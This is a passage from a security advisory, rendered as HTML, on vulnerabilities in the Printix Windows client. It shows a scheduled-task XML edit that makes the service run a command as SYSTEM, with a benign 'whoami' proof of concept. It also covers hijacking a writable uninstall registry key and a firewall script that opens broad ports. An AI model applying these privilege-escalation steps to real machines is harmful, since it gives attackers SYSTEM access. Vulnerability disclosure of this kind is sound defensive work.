&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-16" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-16" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-16"&gt;&lt;/a&gt;            &amp;lt;UserId&amp;gt;S-1-5-18&amp;lt;/UserId&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-17" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-17" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-17"&gt;&lt;/a&gt;            &amp;lt;RunLevel&amp;gt;LeastPrivilege&amp;lt;/RunLevel&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-18" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-18" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-18"&gt;&lt;/a&gt;        &amp;lt;/Principal&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-19" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-19" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-19"&gt;&lt;/a&gt;    &amp;lt;/Principals&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-20" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-20" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-20"&gt;&lt;/a&gt;    &amp;lt;Settings&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-21" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-21" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-21"&gt;&lt;/a&gt;        &amp;lt;MultipleInstancesPolicy&amp;gt;IgnoreNew&amp;lt;/MultipleInstancesPolicy&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-22" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-22" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-22"&gt;&lt;/a&gt;        &amp;lt;DisallowStartIfOnBatteries&amp;gt;false&amp;lt;/DisallowStartIfOnBatteries&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-23" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-23" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-23"&gt;&lt;/a&gt;        &amp;lt;StopIfGoingOnBatteries&amp;gt;true&amp;lt;/StopIfGoingOnBatteries&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-24" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-24" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-24"&gt;&lt;/a&gt;        &amp;lt;AllowHardTerminate&amp;gt;true&amp;lt;/AllowHardTerminate&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-25" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-25" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-25"&gt;&lt;/a&gt;        &amp;lt;StartWhenAvailable&amp;gt;false&amp;lt;/StartWhenAvailable&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-26" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-26" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-26"&gt;&lt;/a&gt;        &amp;lt;RunOnlyIfNetworkAvailable&amp;gt;false&amp;lt;/RunOnlyIfNetworkAvailable&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-27" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-27" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-27"&gt;&lt;/a&gt;        &amp;lt;IdleSettings&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-28" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-28" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-28"&gt;&lt;/a&gt;            &amp;lt;StopOnIdleEnd&amp;gt;true&amp;lt;/StopOnIdleEnd&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-29" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-29" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-29"&gt;&lt;/a&gt;            &amp;lt;RestartOnIdle&amp;gt;false&amp;lt;/RestartOnIdle&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-30" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-30" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-30"&gt;&lt;/a&gt;        &amp;lt;/IdleSettings&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-31" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-31" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-31"&gt;&lt;/a&gt;        &amp;lt;AllowStartOnDemand&amp;gt;true&amp;lt;/AllowStartOnDemand&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-32" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-32" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-32"&gt;&lt;/a&gt;        &amp;lt;Enabled&amp;gt;true&amp;lt;/Enabled&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-33" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-33" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-33"&gt;&lt;/a&gt;        &amp;lt;Hidden&amp;gt;false&amp;lt;/Hidden&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-34" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-34" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-34"&gt;&lt;/a&gt;        &amp;lt;RunOnlyIfIdle&amp;gt;false&amp;lt;/RunOnlyIfIdle&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-35" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-35" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-35"&gt;&lt;/a&gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-36" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-36" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-36"&gt;&lt;/a&gt;&amp;lt;DisallowStartOnRemoteAppSession&amp;gt;false&amp;lt;/DisallowStartOnRemoteAppSession&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-37" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-37" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-37"&gt;&lt;/a&gt;        &amp;lt;UseUnifiedSchedulingEngine&amp;gt;true&amp;lt;/UseUnifiedSchedulingEngine&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-38" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-38" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-38"&gt;&lt;/a&gt;        &amp;lt;WakeToRun&amp;gt;false&amp;lt;/WakeToRun&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-39" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-39" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-39"&gt;&lt;/a&gt;        &amp;lt;ExecutionTimeLimit&amp;gt;PT1H&amp;lt;/ExecutionTimeLimit&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-40" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-40" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-40"&gt;&lt;/a&gt;        &amp;lt;Priority&amp;gt;1&amp;lt;/Priority&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-41" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-41" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-41"&gt;&lt;/a&gt;    &amp;lt;/Settings&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-42" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-42" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-42"&gt;&lt;/a&gt;    &amp;lt;Actions Context="Author"&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-43" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-43" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-43"&gt;&lt;/a&gt;        &amp;lt;Exec&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-44" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-44" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-44"&gt;&lt;/a&gt;            &amp;lt;Command&amp;gt;cmd&amp;lt;/Command&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-45" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-45" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-45"&gt;&lt;/a&gt;            &amp;lt;Arguments&amp;gt;/c "netsh start PrintixService"&amp;lt;/Arguments&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-46" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-46" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-46"&gt;&lt;/a&gt;        &amp;lt;/Exec&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-47" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-47" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-47"&gt;&lt;/a&gt;    &amp;lt;/Actions&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-48" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-48" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-48"&gt;&lt;/a&gt;&amp;lt;/Task&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The command will be executed by the Printix Windows service, which runs as &lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt; user. For testing purposes, the command section of the XML file was changed to only write the name of the user running the command itself into a text file located at &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\temp\output.txt&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-1" name="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-1" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_cb5078f41b4f4f5d89b98f786d443fe3-1"&gt;&lt;/a&gt;&amp;lt;Exec&amp;gt;
&lt;a id="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-2" name="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-2" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_cb5078f41b4f4f5d89b98f786d443fe3-2"&gt;&lt;/a&gt;    &amp;lt;Command&amp;gt;c:\windows\system32\cmd&amp;lt;/Command&amp;gt;
&lt;a id="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-3" name="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-3" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_cb5078f41b4f4f5d89b98f786d443fe3-3"&gt;&lt;/a&gt;    &amp;lt;Arguments&amp;gt;/c "whoami &amp;gt; c:\temp\output.txt"&amp;lt;/Arguments&amp;gt;
&lt;a id="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-4" name="rest_code_cb5078f41b4f4f5d89b98f786d443fe3-4" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_cb5078f41b4f4f5d89b98f786d443fe3-4"&gt;&lt;/a&gt;&amp;lt;/Exec&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After restarting the Printix service another time, and stopping it afterwards to make sure any open file handles are closed and flushed, the new file appears as expected, with the following contents.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\temp\output.txt&lt;/span&gt;&lt;/code&gt;&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_b668352376a04a1f8be94d19ae94d965-1" name="rest_code_b668352376a04a1f8be94d19ae94d965-1" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_b668352376a04a1f8be94d19ae94d965-1"&gt;&lt;/a&gt;nt authority\system
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This confirmes that the command listed in the XML file is executed as &lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt; user.
As a result, a regular user is able to run commands with higher then intended privileges.
The only problem an attacker has, is that a regular user is not able to restart a service at will.
However, if this attack is performed on a physical machine, it would be possible to achieve
the service restart by restarting Windows or power cycling the whole machine.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="abusing-the-uninstall-related-registry-keys"&gt;
&lt;h5&gt;1.2 Abusing the uninstall related registry keys&lt;/h5&gt;
&lt;p&gt;Another problem appears in the registry keys responsible for uninstalling parts of the Printix application.
One of the keys is present at &lt;code class="docutils literal"&gt;HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/printix&lt;/code&gt;.
This key is not write-protected, allowing any user to add new entries to it, and changing the behaviour of the uninstallation procedure of Printix.
If an attacker, for example, switches the value of the existing entry &lt;code class="docutils literal"&gt;SystemComponent&lt;/code&gt; from 1 to 0 and
adds a new entry called &lt;code class="docutils literal"&gt;DisplayName&lt;/code&gt;, a new item would appear in the Programs and Features section of the Windows Control Panel application.&lt;/p&gt;
&lt;p&gt;If the attacker further modifies the registry and changes the existing entry &lt;code class="docutils literal"&gt;UninstallString&lt;/code&gt; to the path of a binary under their control, the malicious binary would get executed if an administrator decides to uninstall the software.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h4&gt;Precondition&lt;/h4&gt;
&lt;p&gt;An attacker has access to the system, modifies the mentioned registry keys and is able to inject their own malicious binaries, that are written in a way that the anti-malware solution in use is not able to detect them.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="opened-ports-by-printix"&gt;
&lt;h3&gt;2. Opened ports by Printix&lt;/h3&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1, 0.0 Information&lt;/pre&gt;
&lt;p&gt;The default installation of Printix on Windows configures the Windows Firewall to open multiple
ports, but does not limit the rules to a specific application.&lt;/p&gt;
&lt;section id="impact-2"&gt;
&lt;h4&gt;Impact&lt;/h4&gt;
&lt;p&gt;An attacker could utilise the whitelisted outbound and inbound ports for establishing new connections to servers under their control and potentially use it for data exfiltration.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-1"&gt;
&lt;h4&gt;Technical details&lt;/h4&gt;
&lt;p&gt;The printix.net application is installed in &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\Program&lt;/span&gt; Files\printix.net\Printix Client&lt;/code&gt; and contains a batch script called &lt;code class="docutils literal"&gt;open_firewall.cmd&lt;/code&gt; that configures the Windows Firewall to allow communication to and from the Printix Client to services outside the local system.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source&lt;/strong&gt;: &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\Program&lt;/span&gt; Files\printix.net\Printix Client\open_firewall.cmd&lt;/code&gt;&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-1" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-1" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-1"&gt;&lt;/a&gt;@ECHO *************************************************
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-2" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-2" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-2"&gt;&lt;/a&gt;@ECHO * Delete Printix Client inbound ports
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-3" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-3" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-3"&gt;&lt;/a&gt;@ECHO *************************************************
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-4" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-4" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-4"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix SNMP, UDP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-5" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-5" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-5"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix PDP, UDP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-6" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-6" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-6"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix Raw Print , TCP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-7" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-7" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-7"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix Jobforward, TCP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-8" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-8" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-8"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix Redirector, TCP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-9" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-9" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-9"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix Task Manager, TCP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-10" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-10" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-10"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix UI Communication, TCP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-11" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-11" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-11"&gt;&lt;/a&gt;netsh advfirewall firewall delete rule name="Printix IPP Print, TCP"
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-12" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-12" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-12"&gt;&lt;/a&gt;
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-13" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-13" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-13"&gt;&lt;/a&gt;@ECHO *************************************************
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-14" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-14" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-14"&gt;&lt;/a&gt;@ECHO * Adding Printix Client inbound ports
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-15" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-15" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-15"&gt;&lt;/a&gt;@ECHO *************************************************
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-16" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-16" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-16"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix PDP, UDP" protocol=UDP dir=in localport=21337 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-17" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-17" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-17"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix Jobforward, TCP" protocol=TCP dir=in localport=21335 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-18" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-18" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-18"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix Redirector, TCP" protocol=TCP dir=in localport=21336 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-19" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-19" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-19"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix UI Communication, TCP" protocol=TCP dir=in localport=21338 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-20" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-20" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-20"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix IPP Print, TCP" protocol=TCP dir=in localport=21339 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-21" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-21" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-21"&gt;&lt;/a&gt;
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-22" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-22" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-22"&gt;&lt;/a&gt;@ECHO **************************************************
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-23" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-23" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-23"&gt;&lt;/a&gt;@ECHO * Adding Printix Client outbound ports
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-24" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-24" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-24"&gt;&lt;/a&gt;@ECHO **************************************************
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-25" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-25" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-25"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix SNMP, UDP" protocol=UDP dir=out localport=161 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-26" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-26" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-26"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix PDP, UDP" protocol=UDP dir=out localport=21337 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-27" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-27" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-27"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix Raw Print , TCP" protocol=TCP dir=out localport=9100 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-28" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-28" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-28"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix Jobforward, TCP" protocol=TCP dir=out localport=21335 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-29" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-29" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-29"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix Redirector, TCP" protocol=TCP dir=out localport=21336 action=allow
